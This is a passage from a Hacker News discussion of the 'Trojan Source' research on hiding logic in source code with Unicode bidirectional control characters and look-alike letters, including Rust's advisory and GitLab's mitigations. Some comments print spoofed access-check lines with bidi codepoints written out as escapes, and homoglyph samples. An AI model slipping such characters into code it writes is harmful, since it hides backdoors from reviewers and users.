If we forced them to do everything in English quality was terrible and everything took ages, but it we let them write in Mandarin things were much better.

notJim | karma 6527 | avg karma 3.41 2021-11-01 11:59:06 | [–] similar comments

> it's very hard for me to imagine someone becoming say a competent web dev without picking at least some basic English along the way, so they can handle at least the documentation and stay in a loop on new tech coming out all the time.

Why would they need to learn English to do those things? I'm sure there are Chinese-language tech news sites, and Chinese-language documentation.

dmz73 | karma 402 | avg karma 2.27 2021-11-01 06:36:24 | [–] similar comments

When you code for yourself, write what you want. If you write to collaborate then use English/ASCII. Imagine international aviation if they allowed the same BS that people in IT allow and now even try to promote - everyone talking their own language and not understanding each other - we would have planes colliding and crashing all over the place.

wizzwizz4 | karma 5694 | avg karma 1.61 2021-11-01 08:16:37 | [–] similar comments

Aviation requires real-time communication; it's not a great analogy, I don't think.

Aeolun | karma 23207 | avg karma 2.16 2021-11-01 09:10:30 | [–] similar comments

We used to have that, with exactly the result you describe. Which is why it was changed.

We’ll get there eventually with software, but it generally doesn’t kill people so there’s less incentive.

Aeolun | karma 23207 | avg karma 2.16 2021-11-01 09:08:04 | [–] similar comments

> How would you name a FooBarWicket if you don't speak a word of English?

How would you learn how to make a FooBarWicket without knowing a word of English? Any programming languages control constructs are almost by definition English.

jrochkind1 | karma 26717 | avg karma 3.67 2021-11-01 12:47:02 | [–] similar comments

Agreed, but I'm still curious (and don't know the answer) how often someone actually needs to put a "Bidi override" in a comment... if I were a language designer I'd be tempted to just say they aren't allowed in comments or identifiers or anywhere but string literals/data, and have the compiler/interpreter just reject it.

(I have used a bidi override before myself, for non-malicious purposes!)

account42 | karma 5969 | avg karma 0.98 2021-11-02 09:48:26 | [–] similar comments

> anywhere but string literals/data

The examples [0] posted in this thread have the bidi characters inside a string literal.

[0] https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...

jrochkind1 | karma 26717 | avg karma 3.67 2021-11-02 17:41:46 | [–] similar comments

I'm not sure what they are being posted as examples of there? Can a bidi char in a string literal be succesfully used in the sort of attack in the OP, a "Trojan Source" attack?

If so, that is devious!

It's not clear to me if those example show that though. They show bidi characters being highlighted in a string literal, right.

My hypothesis was that such could not be part of a "trojan source" attack... but this stuff is confusing and I could have it wrong?

Piskvorrr | karma 5073 | avg karma 1.42 2021-11-01 04:44:22 | [–] similar comments

I can attest that it happens, even in (natural) languages that use Latin scripts. Sure, "just use en.US-ASCII" is a mitigation, and most (Euroamerican) code follows this; the bug extends to string literals however ("they don't end where you see them // this is actually not part of the string; return;"), so a different approach is needed.

Const-me | karma 5797 | avg karma 1.88 2021-11-01 04:45:31 | [–] similar comments

Professionally made GUI software needs Unicode even when English localized, for typography.

Proper quotes, proper dashes (ASCII doesn't have a dash character, it only has minus), non-breakable space, soft hyphen, € character, Greek letters like p and µ, etc.

jdavis703 | karma 7391 | avg karma 2.93 2021-11-01 05:15:00 | [–] similar comments

Most of these should be in a separate file for i18n, not directly in the source code.

Const-me | karma 5797 | avg karma 1.88 2021-11-01 05:29:31 | [–] similar comments

Internationalization is not limited to putting strings into a table in resource. It also needs non-trivial amount of code. Printing numbers into strings is code not data. Yet if you want the numbers to look good, like "600 µm" or "6×10?4 meters", you gonna have Unicode in code, not the resources.

Another thing, not every software needs i18n. Depends on the market. I'm yet to see a C++ compiler which would localize their output messages.

kzrdude | karma 11414 | avg karma 2.35 2021-11-01 08:45:50 | [–] similar comments

GCC supports localization, that's one C++ compiler.

Intel C++ compiler seems to have a Japanese version (not tried).

jdavis703 | karma 7391 | avg karma 2.93 2021-11-01 09:08:58 | [–] similar comments

“Meters” is an English word, and a string like “600 µm” should still probably be extracted from the code as “%d µm.”

Const-me | karma 5797 | avg karma 1.88 2021-11-01 12:01:13 | [–] similar comments

Still, there’re also string like “6·10?4”

fstrthnscnd | karma 35 | avg karma 0.76 2021-11-01 04:58:03 | [–] similar comments

> Does anyone actually do that in a production code?

Would you accept teaching code as production code? Specifically, if you were to teach programming to young non English speakers, wouldn't you accept them to use words of their native tongue for variables and such?

> I'd actually consider it a bad idea, as it limits significantly who can manage that code in the future.

Wouldn't you say that solely using roman letters in code would impose a similar limit? In countries where these letters are seldom used (like for instance greek letters in western countries), only those accustomed to them would be able to handle code (as it has been the case until the last decade perhaps).

Bayart | karma 3538 | avg karma 2.6 2021-11-01 10:37:56 | [–] similar comments

I've definitely seen it done, in both code I was adjacent to and code I was pulling from outside. I have vivid memories of stumbling on a lib doing seemingly what I needed but with all comments in Chinese and variables/funcs in Pinyin.

smsm42 | karma 17167 | avg karma 2.28 2021-11-01 11:57:58 | [–] similar comments

Can you give an example? I've never seen a project (outside domains on APL, etc.) that seriously relied on any Unicode capabilities in the code itself (again, I am not talking about localized strings). My native language is not English, I've worked with people all over Europe, China, India, Japan, Israel, etc. - there are a lot of exciting i18n/l10n problems but I have never seen much of what a compiler would need to be concerned with.

klohto | karma 1976 | avg karma 3.74 2021-11-01 03:50:33 | [–] similar comments

You argument away your own fix. Proposed fix is like if rm was limited to files outside of /sys, plenty of projects depend on the standardized behavior.

robin_reala | karma 63921 | avg karma 9.98 2021-11-01 03:53:45 | [–] similar comments

APL developers would disagree.

smsm42 | karma 17167 | avg karma 2.28 2021-11-02 14:26:27 | [–] similar comments

For people that spend their days reviewing APL code, the concerns of mere mortals are not important.

Sebb767 | karma 7572 | avg karma 3.75 2021-11-01 07:02:35 | [–] similar comments

> The rm tool doesn't know which files are important to you, and the compiler doesn't - and shouldn't - know what you consider to be "correct" code.

This is actually no longer true. Many rm implementations today prevent you from deleting a path including the root directory, unless you explicitly specify `--no-preserve-root`. Similarly, a lot of compilers tend to warn you or outright stop if they detect code that is very likely to be buggy - the rust compiler warning about these control characters is just the latest example.

Of course, in theory, each tool should do its job and the user should be the boundary to know whats right. In practice, though, these heuristics tend to catch bugs-to-be 95% of the time (at least in my experience) and are easily disabled otherwise, so they are good to have.

wizzwizz4 | karma 5694 | avg karma 1.61 2021-11-01 08:19:20 | [–] similar comments

I couldn't care less about my root directory. The only things I care about are the motherboard firmware and the /home directory, and nothing prevents `rm` from deleting those.

The `--one-file-system` or `--preserve-root=all` flags are more useful than `--preserve-root`, but they're not defaults. (For a good reason: compatibility.)

ComodoHacker | karma 3183 | avg karma 2.05 2021-11-01 03:04:54 | [–] similar comments

The paper: https://www.trojansource.codes/trojan-source.pdf

zeepzeep | karma 905 | avg karma 3.44 2021-11-01 03:31:38 | [–] similar comments

The good old SexyHexe.pdf strikes again.

These problems won't go away for a while, unicode is fucking hard. Almost every app I ever tried it had at least some problems with %u202E (the right to left overwrite),

jeroenhd | karma 24884 | avg karma 4.06 2021-11-01 03:31:55 | [–] similar comments

It all depends on your IDE. I've tried this, and IntelliJ and friends will show a little block with the text RLO for the right to left override or ZWS for zero with spaces for any non-standard character that might mess things up. (Neo)vim will show the unicode espace sequence instead of rendering the text as unicode directs it.

Some compilers, notably clang, will warn you that you're using an "invisible character". Assuming you at least read the warnings your code generates (because if you don't, why not just put exploitable algorithms deep down ontthe software?) you'd probably catch the issue.

Simpler programs such as the text editor that ships with GNOME will freak out, but I don't think most people are coding in that in the first place.

I think this is an interesting peculiarity, but it's not a "threat" to "the security of all code".

aulin | karma 831 | avg karma 2.26 2021-11-01 03:48:15 | [–] similar comments

I'd say that neovim is bugged here and gedit is the one working properly rendering unicode as it should be

aww_dang | karma 3027 | avg karma 1.41 2021-11-01 03:40:03 | [–] similar comments

I filed this domain away under 'security alarmist nonsense' years ago. This headline and story are prime examples of the form.

sydthrowaway | karma 748 | avg karma 1.01 2021-11-01 08:21:16 | [–] similar comments

Seriously. State run espionage is 100x more likely

TruthWillHurt | karma 191 | avg karma 0.64 2021-11-01 03:48:16 | [–] similar comments

Is this a real cause for concern? Simply don't copy code with strange unicode charecters, just like you don't copy code with blocks of bytecode.

samus | karma 1894 | avg karma 1.18 2021-11-01 05:20:45 | [–] similar comments

It's a problem in any environment where people can input Unicode characters. Reviewers might use tools that are not able to see those things.

At the same time, one can't just put a blanket ban on Unicode. It exists for a reason. People want to use their native languages to name identifiers, or at least to write comments. Restricting ourselves to ASCII again and thus forcing English on everybody is not a solution.

lixtra | karma 2274 | avg karma 2.5 2021-11-01 09:57:27 | [–] similar comments

> Restricting ourselves to ASCII again and thus forcing English on everybody is not a solution.

Yet most programming languages force them to use English Arabic numbers.

Wouldn’t it be great to use Roman numerals?

And then images in source code are really difficult to handle. Wouldn’t it be nice to compile a word document with embedded images?

I think I wouldn’t mind staying with ASCII for source code, except for string literals (difficult enough).

samus | karma 1894 | avg karma 1.18 2021-11-02 01:45:26 | [–] similar comments

Arabic numerals can be justified since they are dominant and most commonly used in modern science and technology across the whole world. Supporting additional systems would not introduce too much hassle though. Numbers follow a rigid syntax and generally do not employ free mixing with numerals from other systems.

What I have in mind actually exists already: Jupyther notebooks, which combine code, text, and resources combined into a nice JSON ball. Horrible for SCMs and editors without using special plugins of course.

mkl | karma 11432 | avg karma 2.64 2021-11-01 06:20:04 | [–] similar comments

The point of the vulnerability is that you can't necessarily see the strange Unicode characters.

pitdicker | karma 265 | avg karma 5.3 2021-11-01 03:52:49 | [–] similar comments

Security advisory for the Rust programming language (with a nice explanation): https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html

Rust 1.56.1 will be released later today.

> To assess the security of the ecosystem we analyzed all crate versions ever published on crates.io (as of 2021-10-17), and only 5 crates have the affected codepoints in their source code, with none of the occurrences being malicious.

Preview of the new helpful error: https://i.imgur.com/pGpZOnr.png

robin_reala | karma 63921 | avg karma 9.98 2021-11-01 04:10:01 | [–] similar comments

That’s a really impressively written error message.

sodality2 | karma 3858 | avg karma 3.38 2021-11-01 05:23:52 | [–] similar comments

That's one of Rust's selling points. For all I've used the rust compiler, not once have I ever not known what error it was pointing out: its error messages are incredibly helpful. Occasionally I am unsure why it's an error, but I always know what it's referring to and what I could do to fix it.

Timwi | karma 455 | avg karma 1.93 2021-11-01 06:03:18 | [–] similar comments

I've had the same experience with C#. The error messages always state exactly what's wrong and where in the code it's wrong. Many of them (especially compiler _warnings_ intended to point out syntax that is almost certainly a bug) also tell you how to fix it (e.g. “consider using ‘new’ keyword if hiding was intended”).

hermitdev | karma 3521 | avg karma 2.51 2021-11-01 14:50:48 | [–] similar comments

Personally, I don't know why the last one (“consider using ‘new’ keyword if hiding was intended”) isn't an error by default in C# . Not overriding the base method is almost always a mistake, and if it's not a mistake, better to be explicit about it, anyways. My $.02...

joosters | karma 15062 | avg karma 4.78 2021-11-01 04:10:10 | [–] similar comments

Their advisory is well-written and explains the problem well. The example code they use:

  if access_level != "user" { // Check if admin

opens up a whole can of worms though. You don't need cunning invisible control codes to break that line, you could just replace any of the letters in 'user' with a different, but almost-identical looking unicode symbol and you'd still have an exploit. Even better, this would be a completely deniable attack ("oops, I must have accidentally pressed alt-R while typing that letter" excuse) - whereas explaining away why you checked in some magical RTL/LTR encodings and hacked up a comment is impossible. Plus, it would render well in far more apps, terminals, command line programs, etc etc

_3u10 | karma 12688 | avg karma 16.63 2021-11-01 04:15:01 | [–] similar comments

This stuff has always been there consider this code:

if (uid = NULL) { // Check if root

And if you’re using clang: if ((uid = NULL)) { // Check if root

I'd venture that this is far more dangerous than unicode in strings...

or how about:

strcpy()

or #include anything with a #DEFINE

fstrthnscnd | karma 35 | avg karma 0.76 2021-11-01 04:43:17 | [–] similar comments

> if (uid = NULL) { // Check if root

That's not the same class of error, since here a programmer can see the issue by simple inspection.

> or #include anything with a #DEFINE

This one perhaps is closer to the mark, although not based on unicode.

_3u10 | karma 12688 | avg karma 16.63 2021-11-01 15:26:11 | [–] similar comments

To me it's the same class of error which is convincing humans and other automated tests that your code is OK when it isn't.

I dealt with a bug that only appeared in release builds, and never in debug. The offending code looked roughly like this:

  if (blah)
    #ifdef DEBUG
    baz();
    #endif
  bar();

The systemic problem was it was a project created by interns, and they'd review each others code. By the time the bug got to me the interns had left and a Sr Dev had spent a day looking for the bug. It took me an hour to find it. In isolation its easy to see but in the mess of all the other code, you really have to look for these things.

fstrthnscnd | karma 35 | avg karma 0.76 2021-11-02 11:28:55 | [–] similar comments

Well, if you generalize the statement enough, indeed it's the same class of issue.

In the situation you described:

* you have a fairly easy way to detect the problem

* the interns still have plausible deniability as to whether they intended to leave a defect or not

The problem discussed is clearly meant to be used as an exploit, the likelihood of this problem occurring by accident seems very close to zero.

capitainenemo | karma 1398 | avg karma 2.4 2021-11-01 09:44:39 | [–] similar comments

Rust doesn't allow assignment in conditionals.

https://locka99.gitbooks.io/a-guide-to-porting-c-to-rust/con...

_3u10 | karma 12688 | avg karma 16.63 2021-11-01 15:31:18 | [–] similar comments

It does, in fact the article you posted, shows you exactly when rust allows assignment in conditionals.

As long as you're initializing a variable, it's allowed, if you're not initializing you'll have to use a block expression.

capitainenemo | karma 1398 | avg karma 2.4 2021-11-01 16:21:01 | [–] similar comments

Should have just used this sentence - which also directly covers parent's case.

"Rust does not allow assignment within simple expressions so they will fail to compile. This is done to prevent subtle errors with = being used instead of ==."

Better?

josephcsible | karma 22500 | avg karma 3.06 2021-11-02 01:29:44 | [–] similar comments

Those are all detectable by a programmer's eyes. Unicode attacks are not.

ace112 | karma 3 | avg karma 3.0 2021-11-01 04:36:54 | [–] similar comments

Ooh, or you could just put in the cyrillic '?' and even have it look like it's legit :)

codesections | karma 2576 | avg karma 8.2 2021-11-01 04:55:48 | [–] similar comments

> you could just replace any of the letters in 'user' with a different, but almost-identical looking unicode symbol and you'd still have an exploit.

The post mentions that exploit (and Rust's already existing defense) in the appendix.

Here are the details, as explained in a previous post:

> The compiler will warn about potentially confusing situations involving different scripts. For example, using identifiers that look very similar will result in a warning.

    warning: identifier pair considered confusable between `s` and `s`

https://blog.rust-lang.org/2021/06/17/Rust-1.53.0.html

lol768 | karma 4765 | avg karma 4.8 2021-11-01 05:39:13 | [–] similar comments

Am I missing something here? The spacing around these homoglyph is almost always noticeably wider than it should be such that I don't understand how you could ever miss it in any half-decent code review.

      if access_level != "user" { // Check if admin

      if access_level != "user" { // Check if admin

Come on, that looks obviously off.

hug | karma 2606 | avg karma 4.93 2021-11-01 05:47:28 | [–] similar comments

I th?nk th?t ?t ?s poss?bl? th?t you ?re missing ? f??rly important point.

... And that point is that none of the vowels in my previous sentence are latin, I guess.

mkl | karma 11432 | avg karma 2.64 2021-11-01 05:59:48 | [–] similar comments

I think you missed some. I can't seem to paste your fake "i"s back in, but here's what I see:

  $ xxd
  I th?nk th?t ?t ?s poss?bl? th?t you ?re missing ? f??rly important point.
  00000000: 4920 7468 d196 6e6b 2074 68d0 b074 20d1  I th..nk th..t .
  00000010: 9674 20d1 9673 2070 6f73 73d1 9662 6cd0  .t ..s poss..bl.
  00000020: b520 7468 d0b0 7420 796f 7520 d0b0 7265  . th..t you ..re
  00000030: 206d 6973 7369 6e67 20d0 b020 66d0 b0d1   missing .. f...
  00000040: 9672 6c79 2069 6d70 6f72 7461 6e74 2070  .rly important p
  00000050: 6f69 6e74 2e0a                           oint..

hug | karma 2606 | avg karma 4.93 2021-11-01 06:03:05 | [–] similar comments

Made you look. :)

I also skipped a bunch of the "I"s.

mkl | karma 11432 | avg karma 2.64 2021-11-01 06:09:30 | [–] similar comments

Yes. What browser did you use to make the comment? I can't get all those characters to paste in.

hug | karma 2606 | avg karma 4.93 2021-11-01 06:11:52 | [–] similar comments

Firefox 93.0 on Windows 11. Characters copied & pasted from charmap.exe

a: U+0430 "Cyrillic small letter a"

e: U+0435 "Cyrillic small letter e"

i: U+0456 "Cyrillic small letter Byelorussian-Ukranian i"

nonameiguess | karma 6174 | avg karma 2.71 2021-11-01 07:20:36 | [–] similar comments

If you were really reviewing that code, Rust has algebraic data types, and access level should be an Enum, not a String.

But it's their example. The problem isn't with homoglyphs, though. It's with bidi control characters, which are invisible to a human but not to the compiler, which is how generated code can end up semantically different from source code, which is the actual problem here. What you see in code review would be the first line, even though that isn't actually what is in the source, because an editor that is bidi-aware would show it that way.

steveklabnik | karma 91260 | avg karma 5.08 2021-11-01 12:19:54 | [–] similar comments

> But it's their example

It's the example that the researchers provided to us, to be clear about it.

lol768 | karma 4765 | avg karma 4.8 2021-11-05 06:51:33 | [–] similar comments

> It's with bidi control characters

Sure.. in the original HN submission. I was referring to Rust's built-in homoglyph detection though, which is what the parent comment (and its parent) was about.

joosters | karma 15062 | avg karma 4.78 2021-11-01 06:13:51 | [–] similar comments

The compiler will warn about potentially confusing situations involving different scripts. For example, using identifiers that look very similar will result in a warning.

Unfortunately, I've little experience of rust, so I don't have experience of that warning. It would certainly help catch a one-liner exploit, but wouldn't it be excessively noisy for code written in non-english languages?

wongarsu | karma 24397 | avg karma 4.14 2021-11-01 07:00:49 | [–] similar comments

It only warns if there actually are two identifiers that look similar. Even if it's not malicious it's still confusing and is worth renaming.

But if you want to, turning off specific warnings for a file or block of code is really simple in rust, just add "#[allow(confusable_idents)]"

estebank | karma 4736 | avg karma 3.39 2021-11-01 13:08:39 | [–] similar comments

The Unicode homoglyph lint will only trigger if there are multiple identifiers that can look the same, it's not a blanket warning on anything that isn't ASCII. It's close to what browsers do with domain names. And you can always allow lints.

est31 | karma 15854 | avg karma 4.44 2021-11-01 07:41:36 | [–] similar comments

> warning: identifier pair considered confusable

Note that the lint you mention is about identifiers, while "user" is a literal. The lint does not fire for literals. String literals have always supported non ascii characters since 1.0.0, and there has never been a lint for them, until now with the 1.56.1 release.

estebank | karma 4736 | avg karma 3.39 2021-11-01 12:04:45 | [–] similar comments

Also worth noting that the homoglyph attack isn't linted for in literals or comments, only the bidi codepoints are.

littlestymaar | karma 8278 | avg karma 1.96 2021-11-01 04:09:22 | [–] similar comments

Something puzzles me: this kind of tricks would definitely break syntax highlighting, wouldn't it?

jwilk | karma 8094 | avg karma 2.47 2021-11-01 04:11:33 | [–] similar comments

Another HN discussion:

https://news.ycombinator.com/item?id=29061987

ChrisMarshallNY | karma 26729 | avg karma 3.63 2021-11-01 04:13:56 | [–] similar comments

Looks like avoiding dependencies and snippets is a good way to mitigate this.

In my own work, I use almost no dependencies (aside from compilers and built-in APIs). Scratch that. I use a lot of dependencies, but ones that I have written, and generally rewrite snippets, when I use them.

Also, very little of the code I see, has comments.

Like, any comments; even headerdoc comments.

> Green said the good news is that the researchers conducted a widespread vulnerability scan, but were unable to find evidence that anyone was exploiting this. Yet.

… “yet” …

I know that I’m a “dependency curmudgeon,” but stuff like this just serves to reinforce my posture.

Cthulhu_ | karma 26640 | avg karma 2.23 2021-11-01 04:22:47 | [–] similar comments

But what if this is slipped into your compiler? Your operating system's kernel? A top voted Stack Overflow answer? You can't (or it's infeasible to) check and control everything.

_3u10 | karma 12688 | avg karma 16.63 2021-11-01 04:24:55 | [–] similar comments

Yes, you're totally safe then. I've never heard of standard libraries having problems that affect security, certainly not the str* family of functions.

ChrisMarshallNY | karma 26729 | avg karma 3.63 2021-11-01 08:30:52 | [–] similar comments

Any particular reason for the nasty? I thought we didn't do that kind of thing, around these parts, but I'm often wrong.

_3u10 | karma 12688 | avg karma 16.63 2021-11-01 15:21:44 | [–] similar comments

The pain of having worked under these conditions of not using libraries, usually having to work with subpar libraries that were developed internally.

Like oh, hey, we need a database, great, lets roll our own. Or the ancient version of whatever lib shipped with the OS that is full of bugs solved in subsequent versions.

I see that you now use a lot of dependencies, and retract my statement.

ChrisMarshallNY | karma 26729 | avg karma 3.63 2021-11-01 20:54:04 | [–] similar comments

Feel free to check out my work. You’ll see the quality bar I set for myself. Almost all of the repos are code that I incorporate into my projects. I just. Plain. Don’t. Trust. most code out there.

I can see the kitchen from the lunch counter, and I’m a damn good cook, myself.

I won’t tell anyone else what to do (unless I’m paying them), but I refuse to add code to my projects that I don’t trust completely (which is, I know, not a guarantee, but it’s a pretty good bet).

I have to rely on the core libraries and development tools I use, but, if I have my druthers, I am picky as hell.

Seriously. Look at my stuff. You’ll see that I put my work where my mouth is.

ChrisMarshallNY | karma 26729 | avg karma 3.63 2021-11-01 05:18:45 | [–] similar comments

sigh...Why does it have to be "all or nothing"? These logical fallacies are pretty much a standard in these discussions.

Either have 100%, ironclad security, or "Who cares? YOLO! STDs be damned" abandon?

We do what we can to make sure what we write is as good as possible.

I lock my car door, when I get out. I know that it won't stop a determined thief, but it will avoid problems from the casual knucklehead.

z29LiTp5qUC30n | karma 275 | avg karma 4.23 2021-11-01 04:16:36 | [–] similar comments

The bootstrappable community already produced a solution for this: https://github.com/oriansj/stage0/blob/master/High_level_pro...

im3w1l | karma 8737 | avg karma 1.51 2021-11-01 04:39:27 | [–] similar comments

I remember bringing this up many years ago. Yes specifically making code seem like comments using bidi. I'm just a little bit salty I won't get the credit.

https://bugs.eclipse.org/bugs/show_bug.cgi?id=339146

fullstackchris | karma 633 | avg karma 1.59 2021-11-01 04:58:15 | [–] similar comments

I fail to see how this can actaully be used as an exploit. As some commenters have said, yes, it may be a risk to some open source tools where there is poor due diligence for merge request review process - but that is almost never the case.

Otherwise, if you own your own code, this obviously isn't an issue. (Unless, of couse, for some reason you want to program exploits into software at your organization :) )

Heck, even GitHub already shows a warning for files that have bi-directional unicode...

A bit of an overemotional title if you ask me.

pietroalbini | karma 2649 | avg karma 25.72 2021-11-01 05:04:51 | [–] similar comments

It's this research that prompted GitHub to show warnings, they didn't appear as of yesterday.

willvarfar | karma 17791 | avg karma 5.17 2021-11-01 05:27:58 | [–] similar comments

https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html has a nice clear example.

Full Stack Chris reviews some code that he thinks says:

    if access_level != "user" { // Check if admin

This may be an open source project. This may be an internal bad egg (a very common threat; insider jobs are actually one of the absolute top risks to a company). Or this code may be injected by an attacker who has gained access to the repo and is leaving backdoors that they hope to survive long after their access is blocked or leaving backdoors to make deployed production systems vulnerable. Etc.

And Chris won't notice that the computer will execute:

    if access_level != "user{U+202E} {U+2066}// Check if admin{U+2069} {U+2066}" {

This is not just an attack on compiled languages. Scripting languages are just as vulnerable.

kiklion | karma 192 | avg karma 3.25 2021-11-01 06:48:37 | [–] similar comments

Sorry, still don’t get it.

Isn’t the issue that they are using magic strings? If the strings were something like RoleConstants.Admin then this is avoided?

Though I don’t understand the point of the Unicode characters in the comment string so I must be missing something.

tzs | karma 45790 | avg karma 3.13 2021-11-01 09:17:43 | [–] similar comments

> Though I don’t understand the point of the Unicode characters in the comment string so I must be missing something.

There is no comment string.

kiklion | karma 192 | avg karma 3.25 2021-11-01 10:17:22 | [–] similar comments

So after reading other parts, I get where I was mistaken but still believe proper coding practices of avoiding magic strings would avoid many of the potential issues.

My mistake was thinking the initial Unicode character was changing the comparison string similar to a non printable character could. But instead it flips the ordering so that the comment is part of the comparison string and then the string is terminated.

db48x | karma 6953 | avg karma 2.05 2021-11-03 14:18:37 | [–] similar comments

Don’t get hung up on strings, you can execute this attack with just comments. Look at the other examples in the paper.

The idea here is that you make part of the comment appear to be outside of it, and thus appear to be code that will be executed. You can reshuffle the text arbitrarily, so you can move text backwards to appear to be before the start of the comment, or forwards to appear to be after the end of the comment. If you really want to, you can treat the whole line as an anagram, and rearrange the individual letters into any order you like. This could enable really clever attacks where any use of an enum constant appears to be a use of a different one.

sethammons | karma 7497 | avg karma 2.33 2021-11-01 08:28:37 | [–] similar comments

And the dev wrote test cases (negative ones too!). The test fails and shows admin privileges for the normal user. Debugging ensues. I'd hope.

wizzwizz4 | karma 5694 | avg karma 1.61 2021-11-01 08:38:13 | [–] similar comments

The test has the same kind of change. It passes, and nobody thinks to look at the obviously-correct code.

robotmay | karma 2959 | avg karma 3.66 2021-11-01 05:21:51 | [–] similar comments

This was a pretty interesting thing to mitigate - we added some support around it to GitLab after it was reported to us, which shipped in the latest security release: https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57... (you can actually see it in effect on that commit's examples, which is quite meta). These characters have valid use-cases in right-to-left languages like Arabic, Japanese etc, so it had to be configurable for project-owners if they have legitimate use-cases for it. Our focus was on making sure that repository maintainers could see these characters in code reviews.

The homoglyph attack is interesting but it really should be noticed as part of a code review process, as it requires adding the imitation function calls at some point too. It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.

It's certainly a good lesson in not copy/pasting random snippets from the internet and pasting them into a root shell, however :D (we do always highlight the bidi characters on GitLab snippets, though)

Aside: this was a royal pain in the arse to figure out if I had live examples in the specs, because vim also just rendered them "correctly". I ended up checking the files in Windows Notepad on another machine to sanity check them.

Thanks to the authors for responsible disclosure.

jhgb | karma 3259 | avg karma 1.37 2021-11-01 08:08:04 | [–] similar comments

> It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.

That actually strikes me as very desirable. (Especially in light of the old maxim that "programs must be written for people to read, and only incidentally for machines to execute".)

wizzwizz4 | karma 5694 | avg karma 1.61 2021-11-01 08:10:41 | [–] similar comments

Those Unicode characters aren't just there for show. They're part of real scripts that real people use; it would be annoying for people using those scripts.

jhgb | karma 3259 | avg karma 1.37 2021-11-01 08:14:05 | [–] similar comments

I'm fairly sure this could be arranged for. As in, if there's too many of them belonging to the character set of a particular language, then it's very likely that it's simply a text in that language. But random characters in the middle of ASCII identifiers are probably not something that you want.

robotmay | karma 2959 | avg karma 3.66 2021-11-01 08:24:10 | [–] similar comments

Yeah I'm not opposed to adding highlighting to them, and we are investigating how to do it, but it was less clear-cut than the bidi characters (which are totally invisible when rendered). I think we'll want to make it a bit more configurable and probably a separate option to the one which highlights the bidi characters.

pas | karma 7438 | avg karma 1.12 2021-11-01 13:23:35 | [–] similar comments

Yes, and they should be in well annotated/marked string/data sections, not in logic code.

R0b0t1 | karma 2066 | avg karma 1.31 2021-11-01 13:54:18 | [–] similar comments

This type of attack isn't new. I can't recall the names but there are afair multiple C/C++ coding standards that limit everything to ASCII to avoid precisely this attack, but also others with visually similar but nonequivalent names.

JoshTriplett | karma 44606 | avg karma 4.76 2021-11-01 16:51:07 | [–] similar comments

Exactly. When we were adding support for non-ASCII identifiers to Rust, and thinking about homoglyphs and confusable characters, we needed to evaluate the tradeoffs between catching such characters and inconveniencing the speakers of various languages who want to write Rust in their language.

grishka | karma 11238 | avg karma 3.26 2021-11-01 13:52:12 | [–] similar comments

Latin C and Cyrillic ? aren't the same letter. The latter is actually an "s". It would be a pain in the ass to work with strings if those Cyrillic letters that look like their Latin counterparts reused their codepoints. Imagine having to convert "M" to lowercase. Would that return "m" or "?"? Same for "H", "h" or "?"?

And, actually, there was some really really cursed Soviet encoding that did this to save bits. The Russian railway company still uses it[1] to this day.

[1] https://habr.com/ru/post/547820/

gambas99 | karma 9 | avg karma 3.0 2021-11-01 14:26:44 | [–] similar comments

> there was some really really cursed Soviet encoding

I know at least 10 stories that start like this

jhgb | karma 3259 | avg karma 1.37 2021-11-01 15:42:21 | [–] similar comments

> Latin C and Cyrillic ? aren't the same letter.

Well, as a moderately old Czech, I'm somewhat familiar with Cyrillic. They kind of used to force it on us in schools.

acdha | karma 35410 | avg karma 2.73 2021-11-01 08:31:24 | [–] similar comments

> It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.

Have you tried something similar to what the browsers do where highlighting is only enabled when there are multiple scripts mixed within the same token? Source code seems like it would be harder since you have many tokens rather than just a single one as in a hostname, and I'd be curious how much legitimate usage mixes scripts for technical reasons because you have something like a language or framework convention that certain names start with a particular English-derived term.

robotmay | karma 2959 | avg karma 3.66 2021-11-01 09:17:30 | [–] similar comments

So far we're just detecting individual bidi characters, but looking at characters in their greater context could be quite interesting. This would seem like quite a good use-case for machine-learning too, if you wanted to get super into it.

specialist | karma 10439 | avg karma 1.48 2021-11-01 08:43:17 | [–] similar comments

> It's certainly a good lesson in not copy/pasting random snippets from the internet...

For someone with more gumption than me:

Future copy & paste will default have intermediate screenshot and OCR steps. Voila: charset scrubbing for free.

Why not? Already today misc UIs and renderings disallow text selection. Drives me nuts.

modeless | karma 36822 | avg karma 6.69 2021-11-01 12:50:41 | [–] similar comments

The future is now. Android has been doing this for years and it's awesome. There's no text you can't copy.

To clarify, by default copy and paste works the normal way, but you can open the app switcher to use the OCR copy/paste which works on non-selectable text too, even in images.

QuercusMax | karma 2479 | avg karma 2.61 2021-11-01 14:48:01 | [–] similar comments

There's a way to prevent this - to my great annoyance, health apps (such as the ubiquitous MyHealth variants) and banking apps can prevent you from taking screenshots or copying text. This is presumably to prevent screen-scraping apps from stealing your private data, but it's really annoying when you're trying to screenshot a QR code for some kind of check-in process.

checkyoursudo | karma 2181 | avg karma 2.39 2021-11-01 16:06:40 | [–] similar comments

That's why you need a second phone to photograph the screen of the first phone.

josephcsible | karma 22500 | avg karma 3.06 2021-11-02 01:13:12 | [–] similar comments

If you root your phone, you can use an Xposed module like DisableFlagSecure to get around apps that do that.

kevin_thibedeau | karma 19088 | avg karma 2.16 2021-11-01 14:46:31 | [–] similar comments

This is too complicated for a personal supercomputer to be burdened with. Better to ship everything on the clipboard to a sanitizer service.

stackbutterflow | karma 994 | avg karma 3.68 2021-11-01 08:59:34 | [–] similar comments

> It's certainly a good lesson in not copy/pasting random snippets from the internet and pasting them into a root shell, however

I gotta say that I always make sure that I understand each piece of code that I copy paste but I do copy paste and never thought of this type of attack. Maybe that's something I should pay attention to in the future.

captaincrunch | karma 871 | avg karma 2.39 2021-11-01 09:18:38 | [–] similar comments

from the article, its likely you'd not even notice - unless you pasted in an ascii only editor that doesn't allow anything other than plain old text.

charcircuit | karma 2002 | avg karma 0.38 2021-11-01 09:07:54 | [–] similar comments

>These characters have valid use-cases in right-to-left languages like Arabic, Japanese etc,

I've never seen it used for Japanese. I don't think there is a valid use case for Japanese.

robotmay | karma 2959 | avg karma 3.66 2021-11-01 09:12:07 | [–] similar comments

